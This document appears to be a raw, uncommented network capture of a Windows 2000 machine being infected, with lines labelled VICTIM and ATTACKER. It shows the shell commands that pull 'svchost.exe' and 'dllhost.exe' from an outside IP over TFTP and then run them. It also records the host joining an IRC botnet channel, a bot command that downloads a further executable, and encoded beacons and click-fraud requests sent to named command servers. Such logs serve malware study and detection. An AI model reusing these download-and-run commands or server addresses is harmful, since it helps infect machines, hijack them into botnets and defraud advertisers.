Client: dir dllcache\\\\tftpd.exe; Client: tftp -i 222.232.195.157 get svchost.exe wins\\\\SVCHOST.EXE


VICTIM:  	Microsoft Windows 2000 [Version 5.00.2195] 
VICTIM:  	(C) Copyright 1985-2000 Microsoft Corp.C:\\WINNT\\system32> 
VICTIM:  	dir wins\\dllhost.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\winsFile Not FoundC:\\WINNT\\system32> 
VICTIM:  	dir dllcache\\tftpd.exe 
VICTIM:  	 Volume in drive C has no label. Volume Serial Number is F07B-A028 Directory of C:\\WINNT\\system32\\dllcacheFile Not FoundC:\\WINNT\\system32> 
VICTIM:  	tftp -i 222.232.195.157 get svchost.exe wins\\SVCHOST.EXE 
VICTIM:  	\000\001svchost.exe\000octet\000 
VICTIM:  	\000\004\000\001 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000( 
VICTIM:  	\000\004\000) 
VICTIM:  	\000\004\000* 
VICTIM:  	\000\004\000+ 
VICTIM:  	\000\004\000, 
VICTIM:  	\000\004\000- 
VICTIM:  	\000\004\000. 
VICTIM:  	\000\004\000/ 
VICTIM:  	\000\004\0000 
VICTIM:  	\000\004\0001 
VICTIM:  	\000\004\0002 
VICTIM:  	\000\004\0003 
VICTIM:  	\000\004\0004 
VICTIM:  	\000\004\0005 
VICTIM:  	\000\004\0006 
VICTIM:  	\000\004\0007 
VICTIM:  	\000\004\0008 
VICTIM:  	\000\004\0009 
VICTIM:  	\000\004\000: 
VICTIM:  	\000\004\000; 
VICTIM:  	\000\004\000< 
VICTIM:  	\000\004\000= 
VICTIM:  	\000\004\000> 
VICTIM:  	\000\004\000? 
VICTIM:  	\000\004\000@ 
VICTIM:  	\000\004\000A 
VICTIM:  	\000\004\000B 
VICTIM:  	\000\004\000C 
VICTIM:  	\000\004\000D 
VICTIM:  	\000\004\000E 
VICTIM:  	\000\004\000F 
VICTIM:  	\000\004\000G 
VICTIM:  	\000\004\000H 
VICTIM:  	\000\004\000I 
VICTIM:  	\000\004\000J 
VICTIM:  	\000\004\000K 
VICTIM:  	\000\004\000L 
VICTIM:  	\000\004\000M 
VICTIM:  	\000\004\000N 
VICTIM:  	\000\004\000O 
VICTIM:  	\000\004\000P 
VICTIM:  	\000\004\000Q 
VICTIM:  	\000\004\000R 
VICTIM:  	\000\004\000S 
VICTIM:  	\000\004\000T 
VICTIM:  	\000\004\000U 
VICTIM:  	\000\004\000V 
VICTIM:  	\000\004\000W 
VICTIM:  	\000\004\000X 
VICTIM:  	\000\004\000Y 
VICTIM:  	\000\004\000Z 
VICTIM:  	\000\004\000[ 
VICTIM:  	\000\004\000\\ 
VICTIM:  	\000\004\000] 
VICTIM:  	\000\004\000^ 
VICTIM:  	\000\004\000_ 
VICTIM:  	\000\004\000` 
VICTIM:  	\000\004\000a 
VICTIM:  	\000\004\000b 
VICTIM:  	\000\004\000c 
VICTIM:  	\000\004\000d 
VICTIM:  	\000\004\000e 
VICTIM:  	\000\004\000f 
VICTIM:  	\000\004\000g 
VICTIM:  	\000\004\000h 
VICTIM:  	\000\004\000i 
VICTIM:  	\000\004\000j 
VICTIM:  	\000\004\000k 
VICTIM:  	Transfer successful: 54544 bytes in 44 seconds, 1239 bytes/s 
VICTIM:  	C:\\WINNT\\system32> 
VICTIM:  	\000\001dllhost.exe\000octet\000 
VICTIM:  	\000\004\000\001 
VICTIM:  	tftp -i 222.232.195.157 get dllhost.exe wins\\DLLHOST.EXE 
VICTIM:  	\000\004\000\002 
VICTIM:  	\000\004\000\003 
VICTIM:  	\000\004\000\004 
VICTIM:  	\000\004\000\005 
VICTIM:  	\000\004\000\006 
VICTIM:  	\000\004\000\007 
VICTIM:  	\000\004\000\010 
VICTIM:  	\000\004\000\t 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\013 
VICTIM:  	\000\004\000\014 
VICTIM:  	\000\004\000 
VICTIM:  	\000\004\000\016 
VICTIM:  	\000\004\000\017 
VICTIM:  	\000\004\000\020 
VICTIM:  	\000\004\000\021 
VICTIM:  	\000\004\000\022 
VICTIM:  	\000\004\000\023 
VICTIM:  	\000\004\000\024 
VICTIM:  	\000\004\000\025 
VICTIM:  	\000\004\000\026 
VICTIM:  	\000\004\000\027 
VICTIM:  	\000\004\000\030 
VICTIM:  	\000\004\000\031 
VICTIM:  	\000\004\000\032 
VICTIM:  	\000\004\000\033 
VICTIM:  	\000\004\000\034 
VICTIM:  	\000\004\000\035 
VICTIM:  	\000\004\000\036 
VICTIM:  	\000\004\000\037 
VICTIM:  	\000\004\000  
VICTIM:  	\000\004\000! 
VICTIM:  	\000\004\000\ 
VICTIM:  	\000\004\000# 
VICTIM:  	\000\004\000\$ 
VICTIM:  	\000\004\000% 
VICTIM:  	\000\004\000& 
VICTIM:  	\000\004\000' 
VICTIM:  	\000\004\000( 
VICTIM:  	Transfer successful: 19968 bytes in 16 seconds, 1248 bytes/s 
VICTIM:  	C:\\WINNT\\system32> 
VICTIM:  	wins\\DLLHOST.EXE 
VICTIM:  	NICK wiluseeeUSER f020500 . . :- 
VICTIM:  	Service Pack 2JOIN &virtu 
ATTACKER:	PING :i. 
ATTACKER:	PONG :i. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PING :i. 
ATTACKER:	PONG :i. 
VICTIM:  	JOIN &virtu 
ATTACKER:	:u. PRIVMSG wiluseee :!get http:/shabi.coolnuff.com:2012/p/out/kp.exe 
VICTIM:  	GET /p/out/kp.exe HTTP/1.0User-Agent: DownloadHost: shabi.coolnuff.com:2012Pragma: no-cache 
ATTACKER:	GET /list.php?c=B4AC885F94224AE64DAAC6EE0346C213D049B58E0B3869F4DC9ECA9F5FF8F6DFDFE10E13F3845D3386FFC45E0D4897B5778D4CBB9FE6A5FF432C&v=2&t=0.1284296 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /myck.jpg?t=0.3910028 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: ru.coolnuff.com:2011Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=5749F91DD747DB7F27CAB0EA7903E023970C2016250429EE172ECBB9E73EDFF83F76B7533805EBB66209B9D02D215BB466A1F319EE700755D3E39C366A1D741F297AFF8B4986F867774DC7BD22CC1FC029DE7944EF914E482280422FBE47A6DC0B6AF3EDA8B32BB6EA594ACD070726BCF601735CE4A3C7E0A9F0CEA1AF190FB11810F35A331DED2F80B1F3AAC801A8D6&t=0.682873 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /sn.php?c=001E72969D0D4AEEA64B98C2245E09CAAE35F4C2F2D338FF97AE1C6E15CC3C1B7F36C226477A7A278BE089E0707CC827894E17FD6BF52270D4E46CC60D7A9FF4782B720664ABA33C97ADD5AF3CD2558A0CFB1429E89654524DEFD9B43FC6A5DF96F7859BE4FFF06D44F71086CA33ED657E8B104EF8AB192B1B0F17628A28AD57C0D042E4F9CDD01849700F589C590C706BB7&t=0.5246698 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /p6.asp?MAC=00-0C-29-F7-BD-23&Publicer=100 HTTP/1.0User-Agent: CA 0.0.0.2Host: myck.nucleardiscover.com:88 
ATTACKER:	GET /ck3.jpg?t=0.1654169 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: ru.coolnuff.com:2011Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET / HTTP/1.0Accept: */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: arizonadivorcechildcustody.infoConnection: Keep-Alive 
ATTACKER:	GET /sn.php?c=1907678370E06DBF58B0614C98E0F0021FD65F68EBB9549820431557DA0194B27903FF1280ECAF9F407EA6CBD8E206EF5F981FF92EB10556A28DD472D3AF05740E7286FE15C471EE754F93E96E8028F747B07548FC822325AB098CE131C85822CEAF1D03CCD7DE437BC89A1D080851CBED1A240B1354785FE1B84E21C177259BEEE7248E82B25D9A19236B389151B93D&t=0.3853876 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /?o_id=62461&domainname=arizonadivorcechildcustody.info HTTP/1.0Accept: */*Accept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Connection: Keep-AliveHost: searchportal.information.com 
ATTACKER:	GET /?epl=Jyzn9J9R_qn-R4eIRjtG6gDa-kQgJBROkdzF3iCqj9oF2mrlXIzIDB21Z0bTcYRPLbFBNA1ZsWyKupvEzKTjjkwH30ADqmMtHPC1b4ldu6jhEsOzoRCUKZOxlMYpGw0mjaRjhar-BudKw1kIsUgxU3ki8VY9VII72zNNRSyeQyWGwagqCJLMe7TKNDhIabhHEg1bUw8BEWUrlwRNc0fEEUciN7AYHK27BGNx-sENBPJREQJEC9SlqjPOMZFGDVH2YF6bHFWveNt_AzCipsZgyCEC_LowCBeOU65QHxYjPSZxt-rmuiN2diSEWj1a6IIhO3QipBMUBk35Xr3rJkdx3EpoU2vRpOFys5nf6NoUEJla2zLLSXpkEKDJtFHhKRkZlQDQANITPTXEKEw00KinnmozMZoy9VP9NPVUP0o_1U_VwLQtATDw3_-_AADgfwUAAECAWxwAAGjrE4FZUyZZQTE2aFpC5AEAAPA HTTP/1.0Accept: */*Referer: http:/searchportal.information.com/?o_id=62461&domainname=arizonadivorcechildcustody.infoAccept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: searchportal.information.comConnection: Keep-AliveCookie: arizonadivorcechildcustody.info=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1309007960%7Cclick%3A0%7Cblocked%3A0; ident=search%3A0%7Cexitpop%3A0%7Clload%3A0%7Clvisit%3A1309007960%7Cclick%3A0%7Cblocked%3A0%7Ctoken%3Arxzwwspvwxtusrvu; Spusr=3c0015ac27f44e05e0582e5e 
ATTACKER:	GET /css/0/landing/en.css HTTP/1.0Accept: */*Referer: http:/searchportal.information.com/?o_id=62461&domainname=arizonadivorcechildcustody.infoAccept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: cdn.dsultra.comConnection: Keep-Alive 
ATTACKER:	GET /css/782/landing/en.css HTTP/1.0Accept: */*Referer: http:/searchportal.information.com/?o_id=62461&domainname=arizonadivorcechildcustody.infoAccept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: cdn.dsultra.comConnection: Keep-Alive 
ATTACKER:	GET /images/782/bg_main.jpg HTTP/1.0Accept: */*Referer: http:/searchportal.information.com/?o_id=62461&domainname=arizonadivorcechildcustody.infoAccept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: cdn.dsultra.comConnection: Keep-Alive 
ATTACKER:	GET /images/782/bg_searchbox_left.gif HTTP/1.0Accept: */*Referer: http:/searchportal.information.com/?o_id=62461&domainname=arizonadivorcechildcustody.infoAccept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: cdn.dsultra.comConnection: Keep-Alive 
ATTACKER:	GET /images/782/bul_arrow_orange.gif HTTP/1.0Accept: */*Referer: http:/searchportal.information.com/?o_id=62461&domainname=arizonadivorcechildcustody.infoAccept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: cdn.dsultra.comConnection: Keep-Alive 
ATTACKER:	GET /images/782/bg_searchbox_right.gif HTTP/1.0Accept: */*Referer: http:/searchportal.information.com/?o_id=62461&domainname=arizonadivorcechildcustody.infoAccept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: cdn.dsultra.comConnection: Keep-Alive 
ATTACKER:	GET /images/782/bg_searchbox_textfield.gif HTTP/1.0Accept: */*Referer: http:/searchportal.information.com/?o_id=62461&domainname=arizonadivorcechildcustody.infoAccept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: cdn.dsultra.comConnection: Keep-Alive 
ATTACKER:	GET /images/782/but_search_left.gif HTTP/1.0Accept: */*Referer: http:/searchportal.information.com/?o_id=62461&domainname=arizonadivorcechildcustody.infoAccept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: cdn.dsultra.comConnection: Keep-Alive 
ATTACKER:	GET /images/782/but_search_right.gif HTTP/1.0Accept: */*Referer: http:/searchportal.information.com/?o_id=62461&domainname=arizonadivorcechildcustody.infoAccept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: cdn.dsultra.comConnection: Keep-Alive 
ATTACKER:	GET /sn.php?c=F2EC7A9E91016DBFE70FFED31961D82AD910D2E5E1B3F13D781B7032CC171E38641E907D036FF7C7A8969CF196AC55BC8443658366F9ABF8705F14B2423E9AEB5D21631B5081BF203E040D77AF41D00FC73082BF5A24E7E175D7E08D50A91D67CEAF1F01F2E95BC6EA598B1DAC556DE532C77826D784586A687C3144DE7CEE14E7F73198A0929F202D1B96C216D092EE964B&t=9.649295E-02 HTTP/1.0User-Agent: Mozilla/4.0 (compatible; MSIE 5.00.3315.1000; Windows NT 5.0.2195)Host: w.nucleardiscover.com:888Connection: Keep-AlivePragma: no-cache 
ATTACKER:	GET /?epl=irtS6LvarmHL2QSqHSknOvAv0oULCYVTJHfxn0fVtXHScqLhq8d35goREjWFNZHSssDrQifXYpZOFXqvMj1H1WpQA-0Km6M1l3NYLlIjg4d8AI2Txg6v8D0J_r2E5e0hRi5a3QhhjSaFUojRLiZMNbLWGboGDo6ckWyYZcqfV0VIIBhByVkHiKpVjzMdEZoSmHBwjRootgt59VKCDDU1w7LYMmyS-sAGZJN2UUjCsXZMu5RItZrVNtSFzUPT8ytuCPu5RbX4A7Rl8LO94xRB-fBt3tiYiOkT93XdsPrOefuCqyUhRTMilI24kBHMg8JhqytCSiBpYL-vFtB9KewMGKq8ZiPRIkbVoIMyS7KRMWQf76VZjXm-Lcz6oitfeJ5ixy5OabsxRMwJYIz28_0Ho39bAKgHmoyon2TKE5FBBrVRTxNTQ81EmiY8VYKG2jT1pOkpAiZP0TRNGqyZTQEw8N__vwAA4HsFAABAgNseAAD_Il24WVMmWUExNmhaQhMCAADw&query=divorce HTTP/1.0Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*Referer: http:/searchportal.information.com/?o_id=62461&domainname=arizonadivorcechildcustody.infoAccept-Language: en-usUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)Host: searchportal.information.comConnection: Keep-AliveCookie: arizonadivorcechildcustody.info=search%3A0%7Cexitpop%3A0%7Clload%3A1309007961%7Clvisit%3A1309007960%7Cclick%3A0%7Cblocked%3A0; ident=search%3A0%7Cexitpop%3A0%7Clload%3A1309007961%7Clvisit%3A1309007960%7Cclick%3A0%7Cblocked%3A0%7Ctoken%3Avvzrywpwpusqpptv; Spusr=3c0015ac27f44e05e0582e5e 
ATTACKER:	PING :i. 
ATTACKER:	PONG :i. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PING :i. 
ATTACKER:	PONG :i. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :i. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :i. 
VICTIM:  	JOIN &virtu 
ATTACKER:	PONG :i. 
VICTIM:  	JOIN &virtu